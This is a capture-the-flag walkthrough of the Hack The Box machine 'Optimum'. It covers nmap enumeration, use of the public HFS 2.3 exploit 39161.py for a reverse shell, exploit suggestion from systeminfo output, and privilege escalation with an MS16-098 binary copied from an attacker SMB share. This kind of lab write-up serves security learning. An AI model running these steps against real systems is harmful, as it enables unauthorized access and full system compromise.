OPTIMUM — HTB
MACHINE IP — 10.10.10.8
Nmap
# nmap -v -A -sVC -oN nmap 10.10.10.8
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|7|Vista|2008
we got to see that only http port open
we got to see that HTTPSERVER 2.3 is running on it
After we enumerated the whole page but didn’t find any useful hint to move in google and searching for server version vulnerability i got 39161.py from github here, this is python exploit gives a reverse shell but small changes in python script
ip_addr = YOUR IPlocal_port = YOUR PORT NOTE :- change this in the python script (39161.py) for getting shell
we got reverse shell of kostas user
After getting shell we get to see i am kostas user
by using whoami command and move to C:\Users\kostas\Desktop\user.txt.txt to see user hash
we are searching Administrator power and run systeminfo command
systeminfoHost Name: OPTIMUM
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00252-70000-00000-AA535
Original Install Date: 18/3/2017, 1:51:36 ��
System Boot Time: 11/12/2019, 5:04:15 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest
Total Physical Memory: 4.095 MB
Available Physical Memory: 3.461 MB
Virtual Memory: Max Size: 5.503 MB
Virtual Memory: Available: 4.901 MB
Virtual Memory: In Use: 602 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: \\OPTIMUM
Hotfix(s): 31 Hotfix(s) Installed.
[01]: KB2959936
[02]: KB2896496
[03]: KB2919355
[04]: KB2920189
[05]: KB2928120
[06]: KB2931358
[07]: KB2931366
[08]: KB2933826
[09]: KB2938772
[10]: KB2949621
[11]: KB2954879
[12]: KB2958262
[13]: KB2958263
[14]: KB2961072
[15]: KB2965500
[16]: KB2966407
[17]: KB2967917
[18]: KB2971203
[19]: KB2971850
[20]: KB2973351
[21]: KB2973448
[22]: KB2975061
[23]: KB2976627
[24]: KB2977629
[25]: KB2981580
[26]: KB2987107
[27]: KB2989647
[28]: KB2998527
[29]: KB3000850
[30]: KB3003057
[31]: KB3014442
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.8
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
copy this systeminfo and paste in a file at your local-pc named (systeminfo) then run below command for checking the vulnerability for exploiting it
./windows-exploit-suggester.py -d 2019–09–18-mssb.xls -i /root/vijay/htb/windows/optimum/systeminfo1. ./windows-exploit-suggester.py --update
this will give you a latest file of expolits2../windows-exploit-suggester.py --database 2019–09–18-mssb.xls --systeminfo systeminfo2019-09-08-mssb.xls - file you get after update command
systeminfo - file in which you had copied windows output of systeminfo command
This python script is used for getting vulnerability in windows machine so that we can exploit it for privilege escalation
we got exploits MS16–098 to be useful after searching for while i got to see a github repository having .exe
There i got bfill.exe file now the main way i to transfer this file to our target windows machine
I used below command for transferring the file to window machine
python smdserver.py abc .on my local pc
then we use window machine command for
copy\\10.10.14.3\abc\bfill.exe vj.exeon windows machine
Now we just have to run the exploit
and we got access to system access and root.txt
THANKYOU……